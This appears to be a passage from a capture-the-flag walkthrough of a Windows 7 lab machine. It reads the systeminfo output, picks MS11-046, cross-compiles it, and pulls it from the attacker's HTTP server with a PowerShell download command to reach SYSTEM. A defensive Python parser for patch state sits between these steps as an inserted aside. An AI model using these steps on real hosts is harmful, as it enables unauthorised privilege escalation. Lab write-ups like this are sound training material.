Post Exploitation

c:\Users>systeminfo
systeminfo

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:   
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31
System Boot Time:          23/11/2020, 1:43:00
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.023 MB
Available Physical Memory: 682 MB
Virtual Memory: Max Size:  2.047 MB
Virtual Memory: Available: 1.497 MB
Virtual Memory: In Use:    550 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.5

c:\Users>

Looking at the above output, three things stand out:

  • OS Name: Microsoft Windows 7 Enterprise

  • System Type: X86-based PC

  • Hotfix(s): N/A
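As an added example that is not part of the write-up, the following Python parser reads systeminfo output, pulls out the three fields above and flags the patch-state indicators a defender would act on (no hotfixes listed, no service pack). The first input is a trimmed copy of the output above; the second is a constructed sample with placeholder KB numbers so the hotfix-listing branch is exercised too.

```python
import re

# Trimmed copy of the systeminfo output shown above (fields the check uses).
SYSTEMINFO_DEVEL = """\
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
System Type:               X86-based PC
Hotfix(s):                 N/A
"""

# Constructed sample (placeholder KB numbers) of a host that lists hotfixes.
SYSTEMINFO_PATCHED = """\
Host Name:                 WS01
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB9000001
                           [02]: KB9000002
"""

FIELD_RE = re.compile(r"^(.+?):\s{2,}(.*)$")  # "Key:<2+ spaces>value"

def parse_systeminfo(text):
    """Map each field to [value, continuation lines...]; indented lines continue the previous field."""
    fields, current = {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line[0].isspace() and current is not None:  # e.g. "[01]: KB..."
            fields[current].append(line.strip())
            continue
        m = FIELD_RE.match(line.rstrip())
        current = m.group(1).strip() if m else line.rstrip(":").strip()
        fields[current] = [m.group(2).strip() if m else ""]
    return fields

def assess_patch_state(text):
    """Return the indicators the write-up highlights plus defender-side flags."""
    info = parse_systeminfo(text)
    hotfix = info.get("Hotfix(s)", ["N/A"])
    kbs = re.findall(r"KB\d+", " ".join(hotfix[1:]))  # KB ids from continuation lines
    version = info.get("OS Version", [""])[0]
    flags = []
    if hotfix[0].upper() == "N/A" or not kbs:
        flags.append("no hotfixes listed")
    if "Service Pack" not in version:  # systeminfo prints "N/A" here on RTM builds
        flags.append("no service pack (RTM build)")
    return {"os": info.get("OS Name", [""])[0], "version": version,
            "arch": info.get("System Type", [""])[0], "hotfixes": kbs, "flags": flags}
```

Run over a fleet's systeminfo exports, the "flags" list is the quick triage signal: a host that returns both flags has never been updated and should be prioritised for patching or isolation.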

Upon googling we find the following exploit, MS11-046, a local privilege escalation that this unpatched Windows 7 build is missing the fix for.

We have to download it on our Kali machine and cross-compile it for the 32-bit target using the following:

i686-w64-mingw32-gcc MS11-046.c -o MS11-046.exe -lws2_32

Transfer the file to the Windows machine and execute it.

Set up an HTTP server on the attacking machine (port 5555 in the command below) and on the target machine type the following:

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.34:5555/MS11-046.exe', 'c:\Users\Public\Downloads\MS11-046.exe')"
c:\Users\Public\Downloads>MS11-046.exe
MS11-046.exe

c:\Windows\System32>whoami
whoami
nt authority\system

c:\Windows\System32>
